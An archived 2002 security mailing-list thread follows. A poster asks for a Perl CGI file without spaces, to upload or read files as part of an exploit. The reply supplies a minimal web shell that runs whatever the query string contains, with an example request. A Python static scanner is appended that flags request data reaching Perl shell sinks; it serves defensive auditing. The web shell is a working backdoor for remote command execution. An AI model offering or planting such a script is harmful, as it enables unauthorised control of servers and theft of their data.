Re: Coding Conservative CGI Perl

From: Randy Janinda (rjanindaat_private)
Date: Mon Jun 10 2002 - 12:53:23 PDT


    Hmmm. This looks all too familiar. Well, since you're not too picky, why
    not invoke an xterm to display to your console? Or just create a script
    that executes any command you pass to it:
    
    Try this:
    
    #!/usr/bin/perl
    print("Content-type:text/html\n\n");
    `$ENV{QUERY_STRING}`;
    
    then call your puppy with xxx.xxx.xxx/bin/yourscript.cgi?ls
    
    
    
    
    
    On Mon, 2002-06-10 at 01:27, Justin Lavoie wrote:
    > Hello,
    >    This isn't an advisory or a technique or anything that would gain anyone here knowledge. I'm sorry if this is out of place, but it's the only place I knew to turn to - to raise my concern.  I feel kind of uncomfortable asking because I don't know if this newsletter is exactly for what I'm requesting - directly.
    > 
    > I'm working on a type of exploit and in doing so I must develop a *.cgi file that'd run on a Linux and Windows box to allow me to read or upload a file (whatever is possible) without the use of spaces!  To elaborate on what I mean, here's an example of a normal little hello script:
    > 
    > #!/usr/bin/perl
    > print "Content-type:text/html\n\n";
    > print "SUP!<BR>";
    > 
    > This will not work but recoded to work (not having spaces) would be:
    > 
    > #!/usr/bin/perl
    > print("Content-type:text/html\n\n");
    > print("SUP!<BR>");
    > 
    > You can have just about any character other than spaces... I'm no good with perl really, unfortunately. Although I have read quite a number of articles, the only thing I've successfully found remotely useful was using print($ENV{DOCUMENT_ROOT}); to find the location of the file heh.
    > 
    > This is why I raise the question here on what can be done in perl without the use of spaces.  What I've been trying to get was something that allows uploading a file (so basically I could upload another .asp which does contain spaces and solve all my problems).  The uploader doesn't need to be pretty or anything, just has to work, even anyway possible to write another file... Even viewing files or directory listings would be excellent. I'm not picky, I'm not really expecting anything really - just hoping.
    > 
    > I thank you for any advice or help that you may give.
    > 
    > -SiLenCe
    > [Transparent Entity]
    > 
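
For anyone auditing a web root, the pattern in the reply above (request data from `$ENV{QUERY_STRING}` reaching backticks) can be flagged statically. The Python scanner below is an added example, not part of the original thread; the name `scan_cgi`, the source and sink lists, and the `INDIRECT` and `FIXED` samples are assumptions constructed here, and matching is line by line with one-step variable tracking.

```python
import re

# Request-controlled inputs in a Perl CGI script: CGI environment
# variables the client sets, and CGI.pm's param().
SOURCE = re.compile(
    r"\$ENV\{\s*['\"]?(?:QUERY_STRING|PATH_INFO|REQUEST_URI|HTTP_\w+)['\"]?\s*\}"
    r"|\bparam\s*\(")
# Simple scalar assignment, used for one-step taint propagation.
ASSIGN = re.compile(r"(\$\w+)\s*=\s*(.+);")
# Perl constructs that hand a string to a shell or to the interpreter.
SINKS = {
    "backticks": re.compile(r"`([^`]*)`"),
    "qx": re.compile(r"\bqx\b\s*\S(.*)"),
    "system/exec": re.compile(r"\b(?:system|exec)\b\s*\(?(.*)"),
    "eval-string": re.compile(r"\beval\s*\(?\s*([\"$].*)"),
    "piped-open": re.compile(r"\bopen\b(.*\|.*)"),
}

def scan_cgi(source):
    """Return (line_no, sink, code) for each sink fed by request data."""
    tainted, findings = set(), []

    def is_tainted(expr):
        return bool(SOURCE.search(expr)) or any(
            re.search(re.escape(v) + r"\b", expr) for v in tainted)

    for no, line in enumerate(source.splitlines(), 1):
        code = line.strip()
        if code.startswith("#"):          # shebang and whole-line comments
            continue
        for name, sink in SINKS.items():
            m = sink.search(code)
            if m and is_tainted(m.group(1)):
                findings.append((no, name, code))
        m = ASSIGN.search(code)
        if m and is_tainted(m.group(2)):  # variable now carries request data
            tainted.add(m.group(1))
    return findings

# The script from the message above, then two constructed samples.
POSTED = '#!/usr/bin/perl\nprint("Content-type:text/html\\n\\n");\n`$ENV{QUERY_STRING}`;\n'
INDIRECT = "#!/usr/bin/perl\nuse CGI qw(param);\nmy $host = param('host');\nsystem(\"ping -c 1 $host\");\n"
FIXED = '#!/usr/bin/perl\nprint("Content-type:text/plain\\n\\n");\nprint(`uptime`);\n'

if __name__ == "__main__":
    for label, src in (("posted", POSTED), ("indirect", INDIRECT), ("fixed", FIXED)):
        print(label, scan_cgi(src))
```

A hit is a lead for manual review rather than proof; running such scripts under Perl's taint mode (`-T`) makes the interpreter itself refuse to pass unvalidated request data to a shell.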
    



    This archive was generated by hypermail 2b30 : Mon Jun 10 2002 - 21:37:19 PDT